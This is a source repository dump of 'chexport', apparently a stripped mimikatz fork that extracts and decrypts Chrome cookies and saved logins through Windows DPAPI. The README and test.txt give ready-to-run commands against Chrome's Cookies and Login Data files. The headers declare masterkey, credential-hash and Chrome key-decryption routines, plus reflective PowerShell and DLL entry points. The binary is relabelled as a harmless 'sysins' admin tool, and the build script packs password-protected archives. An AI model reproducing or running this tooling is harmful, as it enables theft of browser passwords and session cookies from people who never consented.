├── trunk.lst
├── x64
├── chexport.exe
└── test.txt
├── lib
├── x64
│ ├── bcrypt.lib
│ ├── ncrypt.lib
│ ├── cryptdll.lib
│ └── ntdll.min.lib
└── Win32
│ ├── bcrypt.lib
│ ├── cryptdll.lib
│ ├── ncrypt.lib
│ └── ntdll.min.lib
├── notrunk.lst
├── chexport
├── chexport.vcxproj.user
├── modules
│ ├── kuhl_m.h
│ ├── kuhl_m_standard.h
│ ├── dpapi
│ │ ├── kuhl_m_dpapi.h
│ │ ├── packages
│ │ │ ├── kuhl_m_dpapi_chrome.h
│ │ │ └── kuhl_m_dpapi_chrome.c
│ │ ├── kuhl_m_dpapi_oe.h
│ │ └── kuhl_m_dpapi.c
│ └── kuhl_m_standard.c
├── sysins.rc
├── sysins.h
├── chexport.filters
├── sysins.c
└── chexport.vcxproj
├── README.md
├── inc
├── schnlsp.h
├── PshPack8.h
├── globals.h
├── Midles.h
├── fltUser.h
├── SubAuth.h
├── WinBer.h
└── fltUserStructures.h
├── modules
├── kull_m_output.h
├── kull_m_file.h
├── rpc
│ ├── kull_m_rpc_dpapi-entries.h
│ ├── kull_m_rpc.h
│ ├── kull_m_rpc_dpapi-entries.c
│ └── kull_m_rpc.c
├── kull_m_output.c
├── kull_m_string.h
├── kull_m_file.c
├── kull_m_dpapi.h
├── kull_m_crypto_system.h
└── kull_m_crypto.h
├── appveyor.yml
├── mimicom.idl
└── chexport.sln
/trunk.lst:
--------------------------------------------------------------------------------
1 | .\Win32
2 | .\x64
3 | README.md
4 | kiwi_passwords.yar
5 | mimicom.idl
--------------------------------------------------------------------------------
/x64/chexport.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GamehunterKaan/Chexport/main/x64/chexport.exe
--------------------------------------------------------------------------------
/lib/x64/bcrypt.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GamehunterKaan/Chexport/main/lib/x64/bcrypt.lib
--------------------------------------------------------------------------------
/lib/x64/ncrypt.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GamehunterKaan/Chexport/main/lib/x64/ncrypt.lib
--------------------------------------------------------------------------------
/lib/Win32/bcrypt.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GamehunterKaan/Chexport/main/lib/Win32/bcrypt.lib
--------------------------------------------------------------------------------
/lib/Win32/cryptdll.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GamehunterKaan/Chexport/main/lib/Win32/cryptdll.lib
--------------------------------------------------------------------------------
/lib/Win32/ncrypt.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GamehunterKaan/Chexport/main/lib/Win32/ncrypt.lib
--------------------------------------------------------------------------------
/lib/x64/cryptdll.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GamehunterKaan/Chexport/main/lib/x64/cryptdll.lib
--------------------------------------------------------------------------------
/lib/x64/ntdll.min.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GamehunterKaan/Chexport/main/lib/x64/ntdll.min.lib
--------------------------------------------------------------------------------
/lib/Win32/ntdll.min.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GamehunterKaan/Chexport/main/lib/Win32/ntdll.min.lib
--------------------------------------------------------------------------------
/notrunk.lst:
--------------------------------------------------------------------------------
1 | *.obj
2 | *.lib
3 | *.exp
4 | *.kirbi
5 | *.log
6 | *.hiv
7 | *.key
8 | *.reg
9 | *.pfx
10 | *.cer
11 | *.pvk
12 | *.ndr
13 | *.der
14 | *.dmp
--------------------------------------------------------------------------------
/x64/test.txt:
--------------------------------------------------------------------------------
1 | dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect
2 | dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
3 |
--------------------------------------------------------------------------------
/chexport/chexport.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | true
5 |
6 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # chexport
2 |
3 | ```dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect```
4 |
5 | ```dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data For Account" /unprotect```
6 |
7 | ```dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect```
8 |
--------------------------------------------------------------------------------
/inc/schnlsp.h:
--------------------------------------------------------------------------------
1 | //+---------------------------------------------------------------------------
2 | //
3 | // Microsoft Windows
4 | // Copyright (C) Microsoft Corporation, 1992-1999.
5 | //
6 | // File: schnlsp.h
7 | //
8 | // Contents: Public Definitions for SCHANNEL Security Provider
9 | //
10 | // Classes:
11 | //
12 | // Functions:
13 | //
14 | //----------------------------------------------------------------------------
15 |
16 | #ifndef __SCHNLSP_H__
17 | #define __SCHNLSP_H__
18 |
19 | #if _MSC_VER > 1000
20 | #pragma once
21 | #endif
22 |
23 | #include
24 |
25 |
26 | #endif //__SCHNLSP_H__
27 |
28 |
--------------------------------------------------------------------------------
/modules/kull_m_output.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include
9 | #include
10 |
11 | FILE * logfile;
12 | #if !defined(MIMIKATZ_W2000_SUPPORT)
13 | wchar_t * outputBuffer;
14 | size_t outputBufferElements, outputBufferElementsPosition;
15 | #endif
16 |
17 | void kprintf(PCWCHAR format, ...);
18 | void kprintf_inputline(PCWCHAR format, ...);
19 |
20 | BOOL kull_m_output_file(PCWCHAR file);
21 |
22 | void kull_m_output_init();
23 | void kull_m_output_clean();
--------------------------------------------------------------------------------
/chexport/modules/kuhl_m.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "globals.h"
3 |
4 | typedef NTSTATUS (* PKUHL_M_C_FUNC) (int argc, wchar_t * args[]);
5 | typedef NTSTATUS (* PKUHL_M_C_FUNC_INIT) ();
6 |
7 | typedef struct _KUHL_M_C {
8 | const PKUHL_M_C_FUNC pCommand;
9 | const wchar_t * command;
10 | const wchar_t * description;
11 | } KUHL_M_C, *PKUHL_M_C;
12 |
13 | typedef struct _KUHL_M {
14 | const wchar_t * shortName;
15 | const wchar_t * fullName;
16 | const wchar_t * description;
17 | const unsigned short nbCommands;
18 | const KUHL_M_C * commands;
19 | const PKUHL_M_C_FUNC_INIT pInit;
20 | const PKUHL_M_C_FUNC_INIT pClean;
21 | } KUHL_M, *PKUHL_M;
22 |
--------------------------------------------------------------------------------
/chexport/modules/kuhl_m_standard.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "kuhl_m.h"
8 | #include "../../modules/kull_m_string.h"
9 | #include "../../modules/kull_m_file.h"
10 |
11 | const KUHL_M kuhl_m_standard;
12 |
13 | NTSTATUS kuhl_m_standard_cls(int argc, wchar_t * argv[]);
14 | NTSTATUS kuhl_m_standard_exit(int argc, wchar_t * argv[]);
15 | NTSTATUS kuhl_m_standard_cite(int argc, wchar_t * argv[]);
16 | NTSTATUS kuhl_m_standard_log(int argc, wchar_t * argv[]);
17 | NTSTATUS kuhl_m_standard_cd(int argc, wchar_t * argv[]);
18 | NTSTATUS kuhl_m_standard_localtime(int argc, wchar_t * argv[]);
--------------------------------------------------------------------------------
/chexport/sysins.rc:
--------------------------------------------------------------------------------
1 | #include
2 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
3 |
4 | VS_VERSION_INFO VERSIONINFO
5 |
6 | FILEVERSION 3,6,4,5
7 | PRODUCTVERSION 3,6,4,5
8 | FILEFLAGS VS_FF_PRERELEASE|VS_FF_SPECIALBUILD|VS_FF_PRIVATEBUILD
9 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK
10 | FILEOS VOS_NT
11 | FILETYPE VFT_APP
12 | BEGIN
13 | BLOCK "StringFileInfo"
14 | BEGIN
15 | BLOCK "040904b0"
16 | BEGIN
17 | VALUE "ProductName", "sysins"
18 | VALUE "ProductVersion", "3,6,4,5"
19 | VALUE "CompanyName", "SYSAdmins"
20 | VALUE "FileDescription", "sysins for Windows"
21 | VALUE "FileVersion", "3,6,4,5"
22 | VALUE "InternalName", "sysins"
23 | VALUE "LegalCopyright", "Copyright (c) 2019 - 2021"
24 | VALUE "OriginalFilename", "sysins.exe"
25 | VALUE "PrivateBuild", ""
26 | VALUE "SpecialBuild", ""
27 | END
28 | END
29 | BLOCK "VarFileInfo"
30 | BEGIN
31 | VALUE "Translation", 0x0409, 1200
32 | END
33 | END
--------------------------------------------------------------------------------
/appveyor.yml:
--------------------------------------------------------------------------------
1 | version: 2.2.0-ci-{branch}-{build}
2 | image: Visual Studio 2013
3 | configuration: Release
4 | platform:
5 | - x64
6 | - Win32
7 | shallow_clone: true
8 | build:
9 | parallel: true
10 | verbosity: normal
11 | after_build:
12 | - cmd: >-
13 | 7z a -t7z -mx -ms=on %APPVEYOR_PROJECT_NAME%_trunk_%PLATFORM%.7z -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
14 |
15 | 7z a -tzip -mx -mm=deflate -mpass=15 %APPVEYOR_PROJECT_NAME%_trunk_%PLATFORM%.zip -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
16 |
17 | 7z a -p%APPVEYOR_PROJECT_NAME% -mhe=on -t7z -mx -ms=on %APPVEYOR_PROJECT_NAME%_trunk_password_%PLATFORM%.7z -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
18 |
19 | 7z a -p%APPVEYOR_PROJECT_NAME% -tzip -mx -mm=deflate -mpass=15 %APPVEYOR_PROJECT_NAME%_trunk_password_%PLATFORM%.zip -xr@notrunk.lst .\%PLATFORM% README.md kiwi_passwords.yar mimicom.idl
20 | artifacts:
21 | - path: chexport_trunk_*
--------------------------------------------------------------------------------
/inc/PshPack8.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | Copyright (c) Microsoft Corporation. All rights reserved.
4 |
5 | Module Name:
6 |
7 | pshpack8.h
8 |
9 | Abstract:
10 |
11 | This file turns 8 byte packing of structures on. (That is, it disables
12 | automatic alignment of structure fields.) An include file is needed
13 | because various compilers do this in different ways. For Microsoft
14 | compatible compilers, this files uses the push option to the pack pragma
15 | so that the poppack.h include file can restore the previous packing
16 | reliably.
17 |
18 | The file poppack.h is the complement to this file.
19 |
20 | --*/
21 |
22 | #if ! (defined(lint) || defined(RC_INVOKED))
23 | #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
24 | #pragma warning(disable:4103)
25 | #if !(defined( MIDL_PASS )) || defined( __midl )
26 | #pragma pack(push,8)
27 | #else
28 | #pragma pack(8)
29 | #endif
30 | #else
31 | #pragma pack(8)
32 | #endif
33 | #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
34 |
35 |
--------------------------------------------------------------------------------
/mimicom.idl:
--------------------------------------------------------------------------------
1 | import "ms-dtyp.idl";
2 | [
3 | uuid(17FC11E9-C258-4B8D-8D07-2F4125156244),
4 | version(1.0)
5 | ]
6 | interface MimiCom
7 | {
8 | typedef [context_handle] void* MIMI_HANDLE;
9 |
10 | typedef unsigned int ALG_ID;
11 | typedef struct _MIMI_PUBLICKEY {
12 | ALG_ID sessionType;
13 | DWORD cbPublicKey;
14 | [size_is(cbPublicKey)] BYTE *pbPublicKey;
15 | } MIMI_PUBLICKEY, *PMIMI_PUBLICKEY;
16 |
17 | NTSTATUS MimiBind(
18 | [in] handle_t rpc_handle,
19 | [in, ref] PMIMI_PUBLICKEY clientPublicKey,
20 | [out, ref] PMIMI_PUBLICKEY serverPublicKey,
21 | [out, ref] MIMI_HANDLE *phMimi
22 | );
23 |
24 | NTSTATUS MiniUnbind(
25 | [in, out, ref] MIMI_HANDLE *phMimi
26 | );
27 |
28 | NTSTATUS MimiCommand(
29 | [in, ref] MIMI_HANDLE phMimi,
30 | [in] DWORD szEncCommand,
31 | [in, size_is(szEncCommand), unique] BYTE *encCommand,
32 | [out, ref] DWORD *szEncResult,
33 | [out, size_is(, *szEncResult)] BYTE **encResult
34 | );
35 |
36 | NTSTATUS MimiClear(
37 | [in] handle_t rpc_handle,
38 | [in, string] wchar_t *command,
39 | [out] DWORD *size,
40 | [out, size_is(, *size)] wchar_t **result
41 | );
42 | }
--------------------------------------------------------------------------------
/modules/kull_m_file.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include
9 | #include "kull_m_string.h"
10 |
11 | BOOL ib64IO, ib64II;
12 |
13 | typedef BOOL (CALLBACK * PKULL_M_FILE_FIND_CALLBACK) (DWORD level, PCWCHAR fullpath, PCWCHAR path, PVOID pvArg);
14 |
15 | BOOL kull_m_file_getCurrentDirectory(wchar_t ** ppDirName);
16 | BOOL kull_m_file_getAbsolutePathOf(PCWCHAR thisData, wchar_t ** reponse);
17 | BOOL kull_m_file_isFileExist(PCWCHAR fileName);
18 | BOOL kull_m_file_writeData(PCWCHAR fileName, LPCVOID data, DWORD lenght);
19 | BOOL kull_m_file_readData(PCWCHAR fileName, PBYTE * data, PDWORD lenght); // for 'little' files !
20 | BOOL kull_m_file_readGeneric(PCWCHAR fileName, PBYTE * data, PDWORD lenght, DWORD flags);
21 | void kull_m_file_cleanFilename(PWCHAR fileName);
22 | PWCHAR kull_m_file_fullPath(PCWCHAR fileName);
23 | BOOL kull_m_file_Find(PCWCHAR directory, PCWCHAR filter, BOOL isRecursive /*TODO*/, DWORD level, BOOL isPrintInfos, BOOL isWithDir, PKULL_M_FILE_FIND_CALLBACK callback, PVOID pvArg);
--------------------------------------------------------------------------------
/chexport/modules/dpapi/kuhl_m_dpapi.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "../kuhl_m.h"
9 | #include "../modules/kull_m_file.h"
10 | #include "../modules/kull_m_dpapi.h"
11 |
12 | #include "kuhl_m_dpapi_oe.h"
13 | #include "packages/kuhl_m_dpapi_chrome.h"
14 |
15 | const KUHL_M kuhl_m_dpapi;
16 |
17 | NTSTATUS kuhl_m_dpapi_blob(int argc, wchar_t * argv[]);
18 | NTSTATUS kuhl_m_dpapi_protect(int argc, wchar_t * argv[]);
19 | NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[]);
20 | NTSTATUS kuhl_m_dpapi_credhist(int argc, wchar_t * argv[]);
21 | NTSTATUS kuhl_m_dpapi_create(int argc, wchar_t * argv[]);
22 |
23 | BOOL kuhl_m_dpapi_unprotect_raw_or_blob(LPCVOID pDataIn, DWORD dwDataInLen, LPWSTR *ppszDataDescr, int argc, wchar_t * argv[], LPCVOID pOptionalEntropy, DWORD dwOptionalEntropyLen, LPVOID *pDataOut, DWORD *dwDataOutLen, LPCWSTR pText);
24 | void kuhl_m_dpapi_display_MasterkeyInfosAndFree(LPCGUID guid, PVOID data, DWORD dataLen, PSID sid);
25 | void kuhl_m_dpapi_display_CredHist(PKULL_M_DPAPI_CREDHIST_ENTRY entry, LPCVOID ntlm, LPCVOID sha1);
--------------------------------------------------------------------------------
/chexport/modules/dpapi/packages/kuhl_m_dpapi_chrome.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "../kuhl_m_dpapi.h"
8 | #include "../modules/sqlite3.h"
9 |
10 | NTSTATUS kuhl_m_dpapi_chrome(int argc, wchar_t * argv[]);
11 | BOOL kuhl_m_dpapi_chrome_isTableExist(sqlite3 *pDb, const char *table);
12 | void kuhl_m_dpapi_chrome_decrypt(LPCVOID pData, DWORD dwData, BCRYPT_ALG_HANDLE hAlg, BCRYPT_KEY_HANDLE hKey, int argc, wchar_t * argv[], LPCWSTR type);
13 | void kuhl_m_dpapi_chrome_free_alg_key(BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey);
14 | BOOL kuhl_m_dpapi_chrome_alg_key_from_raw(BYTE key[AES_256_KEY_SIZE], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey);
15 | BOOL kuhl_m_dpapi_chrome_alg_key_from_b64(LPCWSTR base64, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey);
16 | BOOL kuhl_m_dpapi_chrome_alg_key_from_file(LPCWSTR szState, BOOL forced, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey);
17 | BOOL kuhl_m_dpapi_chrome_alg_key_from_auto(LPCWSTR szFile, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey);
--------------------------------------------------------------------------------
/chexport/sysins.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 |
8 | #include "globals.h"
9 | #include "modules/kuhl_m_standard.h"
10 | #include "modules/dpapi/kuhl_m_dpapi.h"
11 | #include
12 | #include
13 | #define DELAYIMP_INSECURE_WRITABLE_HOOKS
14 | #include
15 |
16 | extern VOID WINAPI RtlGetNtVersionNumbers(LPDWORD pMajor, LPDWORD pMinor, LPDWORD pBuild);
17 |
18 | int wmain(int argc, wchar_t * argv[]);
19 | void sysins_begin();
20 | void sysins_end(NTSTATUS status);
21 |
22 | BOOL WINAPI HandlerRoutine(DWORD dwCtrlType);
23 |
24 | NTSTATUS sysins_initOrClean(BOOL Init);
25 |
26 | NTSTATUS sysins_doLocal(wchar_t * input);
27 | NTSTATUS sysins_dispatchCommand(wchar_t * input);
28 |
29 | #if defined(_POWERKATZ)
30 | __declspec(dllexport) wchar_t * powershell_reflective_sysins(LPCWSTR input);
31 | #elif defined(_WINDLL)
32 | void CALLBACK sysins_dll(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow);
33 | #if defined(_M_X64) || defined(_M_ARM64)
34 | #pragma comment(linker, "/export:mainW=sysins_dll")
35 | #elif defined(_M_IX86)
36 | #pragma comment(linker, "/export:mainW=_sysins_dll@16")
37 | #endif
38 | #endif
--------------------------------------------------------------------------------
/chexport/modules/kuhl_m_standard.c:
--------------------------------------------------------------------------------
1 | #include "kuhl_m_standard.h"
2 |
3 | const KUHL_M_C kuhl_m_c_standard[] = {
4 | {kuhl_m_standard_exit, L"exit", L"Quit"},
5 | {kuhl_m_standard_cls, L"cls", L"Clear"},
6 | {kuhl_m_standard_log, L"log", L"Log"},
7 | {kuhl_m_standard_cd, L"cd", L"Change Directory"},
8 | };
9 | const KUHL_M kuhl_m_standard = {
10 | L"standard", L"Standard module", L"Basic commands",
11 | ARRAYSIZE(kuhl_m_c_standard), kuhl_m_c_standard, NULL, NULL
12 | };
13 |
14 | NTSTATUS kuhl_m_standard_exit(int argc, wchar_t * argv[])
15 | {
16 | return argc ? STATUS_THREAD_IS_TERMINATING : STATUS_PROCESS_IS_TERMINATING;
17 | }
18 |
19 | NTSTATUS kuhl_m_standard_cls(int argc, wchar_t * argv[])
20 | {
21 | HANDLE hStdOut = GetStdHandle(STD_OUTPUT_HANDLE);
22 | COORD coord = {0, 0};
23 | DWORD count;
24 | CONSOLE_SCREEN_BUFFER_INFO csbi;
25 |
26 | GetConsoleScreenBufferInfo(hStdOut, &csbi);
27 | FillConsoleOutputCharacter(hStdOut, L' ', csbi.dwSize.X * csbi.dwSize.Y, coord, &count);
28 | SetConsoleCursorPosition(hStdOut, coord);
29 | return STATUS_SUCCESS;
30 | }
31 |
32 | NTSTATUS kuhl_m_standard_log(int argc, wchar_t * argv[])
33 | {
34 | PCWCHAR filename = (kull_m_string_args_byName(argc, argv, L"stop", NULL, NULL) ? NULL : (argc ? argv[0] : MIMIKATZ_DEFAULT_LOG));
35 | kprintf(L"Using \'%s\' for logfile.%s\n", filename, kull_m_output_file(filename) ? L"" : L"");
36 | return STATUS_SUCCESS;
37 | }
38 |
39 | NTSTATUS kuhl_m_standard_cd(int argc, wchar_t * argv[])
40 | {
41 | wchar_t * buffer;
42 | if(kull_m_file_getCurrentDirectory(&buffer))
43 | {
44 | if(argc)
45 | kprintf(L"Cur: ");
46 | kprintf(L"%s\n", buffer);
47 | LocalFree(buffer);
48 | }
49 | else PRINT_ERROR_AUTO(L"kull_m_file_getCurrentDirectory");
50 |
51 | if(argc)
52 | {
53 | if(SetCurrentDirectory(argv[0]))
54 | {
55 | if(kull_m_file_getCurrentDirectory(&buffer))
56 | {
57 | kprintf(L"New: %s\n", buffer);
58 | LocalFree(buffer);
59 | }
60 | else PRINT_ERROR_AUTO(L"kull_m_file_getCurrentDirectory");
61 | }
62 | else PRINT_ERROR_AUTO(L"SetCurrentDirectory");
63 | }
64 | return STATUS_SUCCESS;
65 | }
--------------------------------------------------------------------------------
/modules/rpc/kull_m_rpc_dpapi-entries.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "kull_m_rpc.h"
3 | #include "../kull_m_crypto.h"
4 |
5 | typedef struct _KUHL_M_DPAPI_MASTERKEY_ENTRY {
6 | GUID guid;
7 | BYTE keyHash[SHA_DIGEST_LENGTH];
8 | DWORD keyLen;
9 | BYTE *key;
10 | } KUHL_M_DPAPI_MASTERKEY_ENTRY, *PKUHL_M_DPAPI_MASTERKEY_ENTRY;
11 |
12 | typedef struct _KUHL_M_DPAPI_CREDENTIAL_ENTRY {
13 | DWORD flags;
14 | GUID guid;
15 | WCHAR *sid;
16 | BYTE md4hash[LM_NTLM_HASH_LENGTH];
17 | BYTE md4hashDerived[SHA_DIGEST_LENGTH];
18 | BYTE sha1hash[SHA_DIGEST_LENGTH];
19 | BYTE sha1hashDerived[SHA_DIGEST_LENGTH];
20 | BYTE md4protectedhash[LM_NTLM_HASH_LENGTH];
21 | BYTE md4protectedhashDerived[SHA_DIGEST_LENGTH];
22 | } KUHL_M_DPAPI_CREDENTIAL_ENTRY, *PKUHL_M_DPAPI_CREDENTIAL_ENTRY;
23 |
24 | typedef struct _KUHL_M_DPAPI_DOMAINKEY_ENTRY {
25 | GUID guid;
26 | BOOL isNewKey;
27 | DWORD keyLen;
28 | BYTE *key;
29 | } KUHL_M_DPAPI_DOMAINKEY_ENTRY, *PKUHL_M_DPAPI_DOMAINKEY_ENTRY;
30 |
31 | typedef struct _KUHL_M_DPAPI_ENTRIES {
32 | DWORD MasterKeyCount;
33 | PKUHL_M_DPAPI_MASTERKEY_ENTRY *MasterKeys;
34 | DWORD CredentialCount;
35 | PKUHL_M_DPAPI_CREDENTIAL_ENTRY *Credentials;
36 | DWORD DomainKeyCount;
37 | PKUHL_M_DPAPI_DOMAINKEY_ENTRY *DomainKeys;
38 | } KUHL_M_DPAPI_ENTRIES, *PKUHL_M_DPAPI_ENTRIES;
39 |
40 | size_t KUHL_M_DPAPI_ENTRIES_AlignSize(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType);
41 | void KUHL_M_DPAPI_ENTRIES_Encode(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType);
42 | void KUHL_M_DPAPI_ENTRIES_Decode(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType);
43 | void KUHL_M_DPAPI_ENTRIES_Free(handle_t _MidlEsHandle, KUHL_M_DPAPI_ENTRIES * _pType);
44 |
45 | #define kull_m_dpapi_oe_DecodeDpapiEntries(/*PVOID */data, /*DWORD */size, /*KUHL_M_DPAPI_ENTRIES **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) KUHL_M_DPAPI_ENTRIES_Decode)
46 | #define kull_m_dpapi_oe_FreeDpapiEntries(/*KUHL_M_DPAPI_ENTRIES **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) KUHL_M_DPAPI_ENTRIES_Free)
47 | #define kull_m_dpapi_oe_EncodeDpapiEntries(/*KUHL_M_DPAPI_ENTRIES **/pObject, /*PVOID **/data, /*DWORD **/size) kull_m_rpc_Generic_Encode(pObject, data, size, (PGENERIC_RPC_ENCODE) KUHL_M_DPAPI_ENTRIES_Encode, (PGENERIC_RPC_ALIGNSIZE) KUHL_M_DPAPI_ENTRIES_AlignSize)
--------------------------------------------------------------------------------
/chexport/modules/dpapi/kuhl_m_dpapi_oe.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kuhl_m_dpapi.h"
9 | #include "../modules/rpc/kull_m_rpc_dpapi-entries.h"
10 |
11 | typedef struct _KUHL_M_DPAPI_OE_MASTERKEY_ENTRY {
12 | LIST_ENTRY navigator;
13 | KUHL_M_DPAPI_MASTERKEY_ENTRY data;
14 | } KUHL_M_DPAPI_OE_MASTERKEY_ENTRY, *PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY;
15 |
16 | #define KUHL_M_DPAPI_OE_CREDENTIAL_FLAG_MD4 0x00000001
17 | #define KUHL_M_DPAPI_OE_CREDENTIAL_FLAG_SHA1 0x00000002
18 | #define KUHL_M_DPAPI_OE_CREDENTIAL_FLAG_MD4p 0x00000004
19 | #define KUHL_M_DPAPI_OE_CREDENTIAL_FLAG_GUID 0x80000000
20 | typedef struct _KUHL_M_DPAPI_OE_CREDENTIAL_ENTRY {
21 | LIST_ENTRY navigator;
22 | KUHL_M_DPAPI_CREDENTIAL_ENTRY data;
23 | /*
24 | PVOID DPAPI_SYSTEM_machine;
25 | PVOID DPAPI_SYSTEM_user;
26 | */
27 | } KUHL_M_DPAPI_OE_CREDENTIAL_ENTRY, *PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY;
28 |
29 | typedef struct _KUHL_M_DPAPI_OE_DOMAINKEY_ENTRY {
30 | LIST_ENTRY navigator;
31 | KUHL_M_DPAPI_DOMAINKEY_ENTRY data;
32 | } KUHL_M_DPAPI_OE_DOMAINKEY_ENTRY, *PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY;
33 |
34 | NTSTATUS kuhl_m_dpapi_oe_clean();
35 | NTSTATUS kuhl_m_dpapi_oe_cache(int argc, wchar_t * argv[]);
36 | BOOL kuhl_m_dpapi_oe_is_sid_valid_ForCacheOrAuto(PSID sid, LPCWSTR szSid, BOOL AutoOrCache);
37 | BOOL kuhl_m_dpapi_oe_autosid(LPCWSTR filename, LPWSTR * pSid);
38 |
39 | LIST_ENTRY gDPAPI_Masterkeys;
40 | LIST_ENTRY gDPAPI_Credentials;
41 | LIST_ENTRY gDPAPI_Domainkeys;
42 |
43 | PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY kuhl_m_dpapi_oe_masterkey_get(LPCGUID guid);
44 | BOOL kuhl_m_dpapi_oe_masterkey_add(LPCGUID guid, LPCVOID key, DWORD keyLen);
45 | void kuhl_m_dpapi_oe_masterkey_delete(PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY entry);
46 | void kuhl_m_dpapi_oe_masterkey_descr(PKUHL_M_DPAPI_OE_MASTERKEY_ENTRY entry);
47 | void kuhl_m_dpapi_oe_masterkeys_delete();
48 | void kuhl_m_dpapi_oe_masterkeys_descr();
49 |
50 | PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY kuhl_m_dpapi_oe_credential_get(LPCWSTR sid, LPCGUID guid);
51 | BOOL kuhl_m_dpapi_oe_credential_add(LPCWSTR sid, LPCGUID guid, LPCVOID md4hash, LPCVOID sha1hash, LPCVOID md4protectedhash, LPCWSTR password);
52 | void kuhl_m_dpapi_oe_credential_delete(PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY entry);
53 | void kuhl_m_dpapi_oe_credential_descr(PKUHL_M_DPAPI_OE_CREDENTIAL_ENTRY entry);
54 | void kuhl_m_dpapi_oe_credentials_delete();
55 | void kuhl_m_dpapi_oe_credentials_descr();
56 |
57 | PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY kuhl_m_dpapi_oe_domainkey_get(LPCGUID guid);
58 | BOOL kuhl_m_dpapi_oe_domainkey_add(LPCGUID guid, LPCVOID key, DWORD keyLen, BOOL isNewKey);
59 | void kuhl_m_dpapi_oe_domainkey_delete(PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY entry);
60 | void kuhl_m_dpapi_oe_domainkey_descr(PKUHL_M_DPAPI_OE_DOMAINKEY_ENTRY entry);
61 | void kuhl_m_dpapi_oe_domainkeys_delete();
62 | void kuhl_m_dpapi_oe_domainkeys_descr();
63 |
